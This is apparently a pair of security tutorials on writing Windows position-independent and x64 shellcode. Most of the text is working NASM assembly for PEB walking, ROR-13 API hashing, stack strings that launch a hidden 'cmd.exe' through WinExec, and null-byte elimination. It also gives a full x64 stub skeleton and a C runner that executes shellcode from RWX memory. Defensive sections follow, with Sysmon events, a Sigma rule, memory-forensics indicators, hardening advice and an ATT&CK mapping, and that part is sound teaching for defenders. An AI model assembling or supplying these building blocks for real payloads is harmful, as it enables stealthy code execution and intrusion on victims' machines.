- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
- Bad Characters, Null Bytes, and Restricted Character Sets
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
References
- Obfuscated Files or Information, Technique T1027 – Enterprise | MITRE ATT&CK®
- Obfuscated Files or Information: Encrypted/Encoded File, Sub-technique T1027.013 – Enterprise | MITRE ATT&CK®
- Exploit Writing Tutorial Part 9: Introduction to Win32 Shellcoding | Corelan Cybersecurity Research
- How to Use msfvenom (Bad Chars & Encoders) | Metasploit Documentation – Offensive Security
- MSFencode – Encoding Shellcode to Remove Bad Characters | Metasploit Unleashed – Offensive Security
- Encapsulating Antivirus (AV) Evasion Techniques in Metasploit Framework | Rapid7 Whitepaper
Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.
1. What Makes Code Position-Dependent?
A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.
Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.
The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).
2. The Problem with the IAT
A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:
- It has no
.idatasection, noIMAGE_IMPORT_DESCRIPTOR, and no loader to read them. - It cannot embed an absolute
kernel32!LoadLibraryAaddress because ASLR randomizes module bases every boot. - It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.
The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).
3. Windows Memory Layout Primer: TEB, PEB, and the Loader
Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:
| Architecture | Instruction | Result |
|---|---|---|
| x86 | MOV EAX, FS:[0x30] | EAX ← TEB.ProcessEnvironmentBlock (PEB) |
| x64 | MOV RAX, GS:[0x60] | RAX ← TEB.ProcessEnvironmentBlock (PEB) |
From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.
Relevant offsets (Windows 10/11):
| Struct | Field | x86 offset | x64 offset |
|---|---|---|---|
_TEB | ProcessEnvironmentBlock | +0x030 | +0x060 |
_PEB | Ldr | +0x00C | +0x018 |
_PEB_LDR_DATA | InLoadOrderModuleList | +0x00C | +0x010 |
_PEB_LDR_DATA | InMemoryOrderModuleList | +0x014 | +0x020 |
_PEB_LDR_DATA | InInitializationOrderModuleList | +0x01C | +0x030 |
_LDR_DATA_TABLE_ENTRY | DllBase | +0x018 | +0x030 |
_LDR_DATA_TABLE_ENTRY | BaseDllName | +0x02C | +0x058 |
Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.
// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks; // +0x00
LIST_ENTRY InMemoryOrderLinks; // +0x10 (x64)
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase; // +0x30 (x64)
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName; // +0x58 (x64)
// ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
4. Walking the Module List to Find kernel32.dll
The loader populates InInitializationOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. A common shortcut is to grab the third entry’s DllBase without ever comparing a name — fewer bytes, no strings, no signatures.
; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address
xor rcx, rcx
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18] ; RAX = PEB->Ldr
mov rax, [rax + 0x20] ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
mov rax, [rax] ; 2nd entry: ntdll.dll
mov rax, [rax] ; 3rd entry: kernel32.dll
mov rbx, [rax + 0x20] ; LDR_DATA_TABLE_ENTRY.DllBase
; (offset 0x20 within an InMemoryOrder-rooted entry)For 32-bit shellcode the same idea applies with smaller offsets:
; x86 — same walk, FS-relative
xor ecx, ecx
mov eax, [fs:ecx + 0x30] ; EAX = PEB
mov eax, [eax + 0x0C] ; PEB->Ldr
mov eax, [eax + 0x14] ; InMemoryOrderModuleList.Flink
mov eax, [eax] ; 2nd
mov eax, [eax] ; 3rd (kernel32)
mov ebx, [eax + 0x10] ; DllBase (x86 offset)A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.
5. Parsing the PE Export Directory
Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:
ImageBase
└─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
└─► IMAGE_NT_HEADERS
└─► OptionalHeader.DataDirectory[0] ; EXPORT
└─► IMAGE_EXPORT_DIRECTORY
├─ NumberOfNames
├─ AddressOfNames (RVA → name RVAs)
├─ AddressOfNameOrdinals (RVA → ordinal table)
└─ AddressOfFunctions (RVA → function RVAs)The three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.
; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
mov eax, dword [rbx + 0x3C] ; DOS.e_lfanew
lea rdx, [rbx + rax] ; RDX -> IMAGE_NT_HEADERS
mov eax, dword [rdx + 0x88] ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
lea rcx, [rbx + rax] ; RCX -> IMAGE_EXPORT_DIRECTORY
mov r8d, dword [rcx + 0x18] ; NumberOfNames
mov r9d, dword [rcx + 0x20] ; AddressOfNames (RVA)
mov r10d, dword [rcx + 0x24] ; AddressOfNameOrdinals
mov r11d, dword [rcx + 0x1C] ; AddressOfFunctionsThe resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].

6. Function Name Hashing (ROR-13)
Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:
// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
unsigned int h = 0;
while (*name) {
h = (h >> 13) | (h << (32 - 13)); // ROR 13
h += (unsigned char)*name++;
}
return h;
}
// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA -> 0x0726774C
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess -> 0x73E2D87E
// VirtualAlloc -> 0x91AFCA54Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.
7. RIP-Relative Addressing and the CALL/POP Trick
When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.
x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:
lea rcx, [rel api_hash_table] ; RIP-relative, no relocation neededx86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:
call get_eip
get_eip:
pop ebp ; EBP = address of this instruction
; data referenced as [ebp + (label - get_eip)]Anything stored inline can now be addressed by displacement from EBP.
8. Stack Strings and Null-Byte Elimination
Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.
Construct strings on the stack by pushing immediates:
; Build "cmd.exe\0" on the stack (8 bytes including NUL)
xor rax, rax
push rax ; trailing NUL via zeroed qword
mov rax, 0x6578652E646D63 ; 'cmd.exe' (little-endian, no embedded zero)
push rax
mov rcx, rsp ; RCX -> "cmd.exe\0" — first arg for WinExecEliminate accidental nulls in opcodes:
| Avoid | Use instead | Reason |
|---|---|---|
mov rax, 0 (48 C7 C0 00 00 00 00) | xor rax, rax | Removes four NUL bytes |
push 0 (6A 00) | xor reg, reg; push reg | 6A 00 contains a NUL |
| Short jumps spanning NUL displacements | Pad with nop or reorder code | Avoids NUL in the offset byte |
mov al, 0x00 | xor al, al | Same fix at byte width |
Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.
9. x64 ABI Constraints: Shadow Space and Alignment
Windows x64 imposes two rules shellcode authors get wrong constantly:
RSPmust be 16-byte aligned at the point ofCALLto any Windows API. TheCALLitself pushes an 8-byte return address, so the callee’sRSPends up at(16N - 8)on entry, which is what Microsoft’s prolog code expects.- The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill
RCX,RDX,R8,R9into those slots.
The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.
; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
and rsp, -16 ; force 16-byte alignment
sub rsp, 32 ; shadow space (home space)
lea rcx, [rsp + 0x40] ; pointer to "cmd.exe" (built earlier)
xor rdx, rdx ; uCmdShow = SW_HIDE (0)
call rax ; WinExec
add rsp, 32 ; tear down shadow spaceMisalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.
10. Extraction and Controlled Testing
Once assembled with NASM, raw bytes are extracted from the COFF object and audited:
nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.binA quick Python harness verifies the payload is truly position-independent — no embedded nulls, no relocations:
# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")
null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
print("[+] null-free")
# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:
// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t sc_len;
int main(void) {
void *mem = VirtualAlloc(NULL, sc_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
memcpy(mem, sc, sc_len);
((void(*)())mem)();
return 0;
}The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB walking | Resolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports |
| Export hash resolution | ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings |
| Stack strings | Push immediates to materialise "cmd.exe", "WinExec", etc., on the stack |
| Reflective loading | PIC stub maps a full DLL into memory and calls its DllMain (T1620) |
| Remote injection | VirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID |
| APC queuing | QueueUserAPC to deliver shellcode into an alertable thread |
| Process hollowing | Suspend a benign process, unmap its image, write PIC payload, resume |
| Module stomping | Overwrite the .text of a legitimately loaded DLL with PIC shellcode |
12. Defensive Strategies & Detection
PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.
Sysmon Event IDs to monitor:
| Event ID | Signal |
|---|---|
1 | Process creation (with command line) — anomalous parents (winword.exe → cmd.exe) |
7 | ImageLoad from user-writable paths into system processes |
8 | CreateRemoteThread — primary remote-injection signal |
10 | ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD |
17/18 | Named pipe creation/connection (common C2 channel) |
25 | ProcessTampering (image hollowing) |
ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.
Sigma sketch — cross-process handle access for injection:
title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 10
GrantedAccess|contains:
- '0x1F0FFF' # PROCESS_ALL_ACCESS
- '0x1410' # VM_READ|VM_WRITE|VM_OPERATION
- '0x1F1FFF'
TargetImage|endswith:
- '\lsass.exe'
- '\svchost.exe'
- '\explorer.exe'
filter_legit:
SourceImage|endswith:
- '\MsMpEng.exe'
- '\MsSense.exe'
condition: selection and not filter_legit
level: highMemory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.
Hardening:
| Mitigation | Effect |
|---|---|
ACG (ProcessDynamicCodePolicy) | Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE) |
| DEP / NX | Hardware-enforced non-execute on data pages |
| CFG | Invalidates indirect calls to non-registered targets |
| HVCI | Hypervisor-enforced kernel code integrity |
| ASR rules | Block office/script children, untrusted USB execution, etc. |
Restrict SeDebugPrivilege | Limits which accounts can open and write to other processes |

13. Tools for PIC Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Verify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY) | microsoft.com |
| NASM | Assemble x86/x64 PIC payloads in Intel syntax | nasm.us |
| x64dbg | Dynamic analysis of shellcode in a loader harness | x64dbg.com |
| Ghidra / IDA | Static disassembly of extracted opcodes | ghidra-sre.org |
| Process Hacker | Inspect process memory regions and protections | processhacker.sf.io |
pe-sieve | Hunts injected, hollowed, or stomped modules | github.com/hasherezade/pe-sieve |
| Volatility 3 | malfind, ldrmodules, vadinfo for memory-resident PIC | volatilityfoundation.org |
| YARA | Signature ROR-13 loops, PEB-walk prologues, hash tables | virustotal.github.io/yara |
| SilkETW | Subscribe to THREATINT and Kernel-Process providers | github.com/mandiant/SilkETW |
14. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Reflective Code Loading | T1620 | Volatility malfind / ldrmodules; THREATINT ETW |
| Process Injection (parent) | T1055 | Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM |
| Process Injection: DLL | T1055.001 | Sysmon EID 7 from unusual paths; pe-sieve |
| Process Injection: APC | T1055.004 | Kernel-Process ETW thread events on alertable waits |
| Process Injection: Hollowing | T1055.012 | Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 hash loops and stack-string push sequences |
| Command and Scripting Interpreter | T1059 | EID 4688 / Sysmon EID 1 with command-line auditing |
Summary
- Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
- The PEB →
Ldr→InMemoryOrderModuleListchain reacheskernel32.dllin three pointer dereferences without any string comparison. - Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
- Stack-string construction,
XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free. - Defenders catch the resulting behaviour through Sysmon EID
8/10, THREATINT ETW onVirtualAllocEx/WriteProcessMemory, and Volatilitymalfind/ldrmodulesagainst unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.
Related Tutorials
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Bad Characters, Null Bytes, and Restricted Character Sets
References
- Reflective Code Loading, Technique T1620 – Enterprise | MITRE ATT&CK
- Process Injection, Technique T1055 – Enterprise | MITRE ATT&CK
- Donut – Generating Position-Independent Shellcode | MITRE ATT&CK Software S0695
- Process Injection: Portable Executable Injection, Sub-technique T1055.002 – Enterprise | MITRE ATT&CK
- Position-Independent Code Techniques | hackerhouse-opensource/shellcode | DeepWiki
- PIC-Library: A Collection of Position Independent Coding Resources | GitHub
Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.
1. From x86 to x64: What Actually Changed
Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.
| Item | x86 | x64 |
|---|---|---|
| General-purpose registers | 8 × 32-bit (EAX…EDI) | 16 × 64-bit (RAX…R15) |
| Windows calling convention | stdcall / cdecl — all args on stack | Unified fast-call — first 4 integer args in registers |
| TEB segment register | FS; PEB at fs:[0x30] | GS; PEB at gs:[0x60] |
| Address width | 32-bit | 64-bit (48-bit canonical VA in practice) |
call pushes | 4-byte return address | 8-byte return address |
| RIP-relative addressing | Not available | Available; lea rax, [rip + offset] is idiomatic in PIC |
Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.
2. The Microsoft x64 ABI Deep-Dive
The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.
| Argument # | Integer Register | Floating-Point Register |
|---|---|---|
| 1st | RCX | XMM0L |
| 2nd | RDX | XMM1L |
| 3rd | R8 | XMM2L |
| 4th | R9 | XMM3L |
| 5th+ | Stack (above shadow space) | Stack |
The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.
Volatile vs Non-Volatile Registers
| Class | Registers |
|---|---|
| Volatile | RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5 |
| Non-volatile | RBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15, XMM6–XMM15 |
A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.
Side-by-Side: x86 Push vs x64 Register Load
; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0 ; uType
push title ; lpCaption
push msg ; lpText
push 0 ; hWnd
call [MessageBoxA] ; callee cleans the stack
; --- x64 fastcall: same call ---
xor rcx, rcx ; hWnd = NULL
lea rdx, [rel msg] ; lpText
lea r8, [rel title] ; lpCaption
xor r9d, r9d ; uType = 0
sub rsp, 0x28 ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add rsp, 0x28Note xor r9d, r9d rather than xor r9, r9 — writing to the 32-bit sub-register zero-extends to the full 64-bit register and produces a shorter, null-byte-free opcode.

3. Shadow Space: Why, What, and Where
In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.
Critical points:
- Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
- It is owned by the caller. The callee may overwrite it without saving the previous contents.
- The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
- Stack arguments beyond the fourth begin at
[RSP + 0x28](32 bytes shadow + 8 bytes return address).
Layout immediately after call, before callee prologue | Offset from RSP |
|---|---|
Return address (pushed by call) | [RSP + 0x00] |
Shadow slot for RCX | [RSP + 0x08] |
Shadow slot for RDX | [RSP + 0x10] |
Shadow slot for R8 | [RSP + 0x18] |
Shadow slot for R9 | [RSP + 0x20] |
| 5th argument (if any) | [RSP + 0x28] |
Skip the shadow allocation and the first thing the callee does — often a mov [rsp+8], rcx early in a Win32 prologue — clobbers your own stack frame or, worse, the saved return address you just pushed.

4. Stack Alignment in Practice
The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.
This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:
0x20(32 bytes) for shadow space.+ 0x08to undo the misalignment the precedingcallintroduced.
; Canonical shellcode call wrapper
sub rsp, 0x28 ; 32B shadow + 8B realign
call rax ; rax = resolved API address
add rsp, 0x28When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:
; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0 ; force 16-byte alignment
sub rsp, 0x28 ; shadow + 8 to keep call-time alignmentTo diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, you forgot the + 0x08.
5. Position-Independent Code Fundamentals
Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:
- RIP-relative addressing.
lea rax, [rel label]resolves tolea rax, [rip + disp32]and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode. call/popdelta trick. Acallto the next instruction pushes its return address — the runtime location of the following label. The calleepops it into a register to obtain a base for subsequent offsets.
; Obtain the runtime address of `data` without RIP-relative encoding
call get_rip
get_rip:
pop rbx ; rbx = address of next instruction
lea rsi, [rbx + data - get_rip]
jmp continue
data:
db "kernel32.dll", 0
continue:In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).
6. PEB Walking: Finding kernel32.dll Without Imports
Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:
| Step | Source | Field | Offset (x64) |
|---|---|---|---|
| 1 | GS segment | → TEB | — |
| 2 | TEB | ProcessEnvironmentBlock | +0x060 |
| 3 | PEB | Ldr → PEB_LDR_DATA | +0x018 |
| 4 | PEB_LDR_DATA | InMemoryOrderModuleList | +0x020 |
| 5 | LDR_DATA_TABLE_ENTRY link | InMemoryOrderLinks.Flink | +0x000 |
| 6 | LDR_DATA_TABLE_ENTRY | DllBase (from InMemoryOrderLinks) | +0x030 |
The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the head reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).
; --- PEB walk skeleton: locate kernel32.dll base in rax ---
xor eax, eax
mov rbx, [gs:0x60] ; TEB -> PEB
mov rbx, [rbx + 0x18] ; PEB -> Ldr (PEB_LDR_DATA)
mov rbx, [rbx + 0x20] ; -> InMemoryOrderModuleList.Flink
; (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
mov rbx, [rbx] ; advance: -> 2nd entry (ntdll)
mov rbx, [rbx] ; advance: -> 3rd entry (kernel32)
mov rax, [rbx + 0x30] ; DllBase relative to InMemoryOrderLinks (x64)
; rax now holds kernel32.dll base addressTo verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:
0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32
7. Parsing the Export Address Table
With kernel32.dll‘s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.
Key offsets from a loaded module base:
| Field | Offset |
|---|---|
e_lfanew (RVA of PE header) | DllBase + 0x3C |
| Optional Header | PE_header + 0x18 |
| Export Directory RVA (PE32+) | OptHeader + 0x70 |
AddressOfFunctions | ExportDir + 0x1C |
AddressOfNames | ExportDir + 0x20 |
AddressOfNameOrdinals | ExportDir + 0x24 |
; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)
mov ecx, [rax + 0x3C] ; e_lfanew
add rcx, rax ; rcx = PE header
mov edx, [rcx + 0x88] ; Export Directory RVA (OptHdr + 0x70)
add rdx, rax ; rdx = IMAGE_EXPORT_DIRECTORY
mov r8d, [rdx + 0x18] ; NumberOfNames
mov r9d, [rdx + 0x20] ; AddressOfNames RVA
add r9, rax
xor r10, r10 ; index
.next_name:
mov esi, [r9 + r10*4] ; name RVA
add rsi, rax ; rsi -> ASCII export name
xor edi, edi ; hash accumulator
.hash_byte:
movzx eax, byte [rsi]
test al, al
jz .check
ror edi, 13
add edi, eax
inc rsi
jmp .hash_byte
.check:
cmp edi, ebp ; compare ROR-13 hash
je .found
inc r10
cmp r10d, r8d
jb .next_name
xor rax, rax ; not found
ret
.found:
; resolve via AddressOfNameOrdinals + AddressOfFunctions
; (omitted for brevity)
retThe ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard precisely because defenders now key on it (see §10).
8. Null-Byte and Bad-Character Avoidance
Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.
| Problem | Fix |
|---|---|
mov rax, 0x000000007FFE1234 → nulls | xor eax, eax then mov eax, 0x7FFE1234 (zero-extends) |
64-bit literal in mov r9, imm64 | lea r9, [rel label] or build via shifts/ORs |
push 0 → encodes 6A 00 | xor rcx, rcx ; push rcx |
mov rcx, 0 → 7-byte null run | xor ecx, ecx |
; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
; 48 B8 34 12 AB 76 00 00 00 00 <-- four null bytes
mov rax, 0x76ab1234
; GOOD: zero-extend via 32-bit sub-register
; 31 C0 <-- xor eax, eax
; B8 34 12 AB 76 <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.
A short Python lab to validate a candidate snippet:
from keystone import Ks, KS_ARCH_X86, KS_MODE_64
asm = b"""
xor eax, eax
mov eax, 0x76ab1234
mov rbx, qword ptr gs:[0x60]
mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.
9. Shellcode Skeleton: Putting It Together
The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.
[BITS 64]
_start:
; --- entry: defensively align stack ---
and rsp, 0xFFFFFFFFFFFFFFF0
sub rsp, 0x28 ; shadow space + alignment
; --- locate kernel32.dll via PEB ---
mov rbx, [gs:0x60] ; TEB -> PEB
mov rbx, [rbx + 0x18] ; PEB -> Ldr
mov rbx, [rbx + 0x20] ; InMemoryOrderModuleList.Flink
mov rbx, [rbx] ; -> ntdll entry
mov rbx, [rbx] ; -> kernel32 entry
mov r15, [rbx + 0x30] ; r15 = kernel32 base
; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
mov rcx, r15
mov edx, 0x7C0DFCAA ; ROR-13("GetProcAddress") (illustrative)
call eat_lookup ; rax = &GetProcAddress
mov r14, rax
; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
mov rcx, r15 ; hModule = kernel32
lea rdx, [rel s_LoadLibraryA]
call r14 ; rax = &LoadLibraryA
lea rcx, [rel s_user32]
call rax ; rax = HMODULE user32
; --- ... continue resolution and API calls ...
add rsp, 0x28
ret
s_LoadLibraryA: db "LoadLibraryA", 0
s_user32: db "user32.dll", 0
